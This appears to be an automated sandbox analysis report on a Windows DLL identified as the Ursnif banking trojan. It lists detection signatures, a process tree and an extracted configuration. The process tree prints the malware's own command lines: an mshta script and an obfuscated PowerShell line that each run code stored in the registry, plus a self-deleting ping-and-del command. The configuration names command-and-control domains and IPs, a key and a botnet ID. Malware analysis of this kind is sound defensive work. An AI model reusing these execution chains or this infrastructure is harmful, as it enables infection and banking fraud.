Edit tour
Windows
Analysis Report
qOfIxt1fnQ.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 5860 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\qOf Ixt1fnQ.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6084 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\qOf Ixt1fnQ.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 4428 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\qOfI xt1fnQ.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 492 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- mshta.exe (PID: 6492 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Rwr3='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Rwr3).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 5600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name gcqr bwksb -val ue gp; new -alias -na me jkgyvx -value iex ; jkgyvx ( [System.Te xt.Encodin g]::ASCII. GetString( (gcqrbwksb "HKCU:Sof tware\AppD ataLow\Sof tware\Micr osoft\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E").UrlsR eturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 2964 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\zek5yaf t\zek5yaft .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6624 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RES1B0A. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\z ek5yaft\CS C3DAC9030B 4CB46878A3 398CFC11AF 7A7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 5672 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\zbedhqo b\zbedhqob .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5368 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RES3EDE. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\z bedhqob\CS CD26AEEEF9 294175AE6F C384D16318 24.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3808 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 628 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\qOfIxt1f nQ.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 352 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4184 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 3 entries |
⊘No Sigma rule has matched
Timestamp: | 05/04/22-16:20:11.489303 05/04/22-16:20:11.489303 |
SID: | 2033203 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:20:12.290322 05/04/22-16:20:12.290322 |
SID: | 2033203 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:19:50.763686 05/04/22-16:19:50.763686 |
SID: | 2033203 |
Source Port: | 49768 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:20:10.851257 05/04/22-16:20:10.851257 |
SID: | 2033204 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_00FE5FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_058065C2 | |
Source: | Code function: | 2_2_058099BC | |
Source: | Code function: | 2_2_0581BAD1 |
Source: | Code function: | 2_2_0580FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_00FE1CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_00FE5FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Code function: | 2_2_00FE829C | |
Source: | Code function: | 2_2_00FE1645 | |
Source: | Code function: | 2_2_00FE4BF1 | |
Source: | Code function: | 2_2_05823DB0 | |
Source: | Code function: | 2_2_0581154D | |
Source: | Code function: | 2_2_058067CA | |
Source: | Code function: | 2_2_0581D7F1 | |
Source: | Code function: | 2_2_0581FF4D | |
Source: | Code function: | 2_2_0580B238 |
Source: | Code function: | 2_2_05818E57 |
Source: | Code function: | 2_2_00FE4321 | |
Source: | Code function: | 2_2_00FE190C | |
Source: | Code function: | 2_2_00FE6D0A | |
Source: | Code function: | 2_2_00FE84C1 | |
Source: | Code function: | 2_2_05816DE0 | |
Source: | Code function: | 2_2_058074AE | |
Source: | Code function: | 2_2_0580C431 | |
Source: | Code function: | 2_2_05810782 | |
Source: | Code function: | 2_2_0581BE80 | |
Source: | Code function: | 2_2_058161AE | |
Source: | Code function: | 2_2_0580710A | |
Source: | Code function: | 2_2_05817950 | |
Source: | Code function: | 2_2_058100DC | |
Source: | Code function: | 2_2_0581A806 | |
Source: | Code function: | 2_2_05815312 | |
Source: | Code function: | 2_2_05812331 | |
Source: | Code function: | 2_2_058064C4 | |
Source: | Code function: | 2_2_0580B7D5 | |
Source: | Code function: | 2_2_0580D77A | |
Source: | Code function: | 2_2_058036BB | |
Source: | Code function: | 2_2_058010C7 | |
Source: | Code function: | 2_2_05813829 | |
Source: | Code function: | 2_2_0581EAC5 | |
Source: | Code function: | 2_2_05815220 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_00FE68BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_00FE7EA9 | |
Source: | Code function: | 2_2_00FE829B | |
Source: | Code function: | 2_2_05823DAF | |
Source: | Code function: | 2_2_05803496 | |
Source: | Code function: | 2_2_058238A9 |
Source: | Static PE information: |
Source: | Code function: | 2_2_0580EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_058065C2 | |
Source: | Code function: | 2_2_058099BC | |
Source: | Code function: | 2_2_0581BAD1 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0580FD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 2_2_0580EC00 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_05808FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_00FE3365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_058181F1 |
Source: | Code function: | 2_2_00FE76BB |
Source: | Code function: | 2_2_00FE6D78 |
Source: | Code function: | 2_2_00FE3365 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
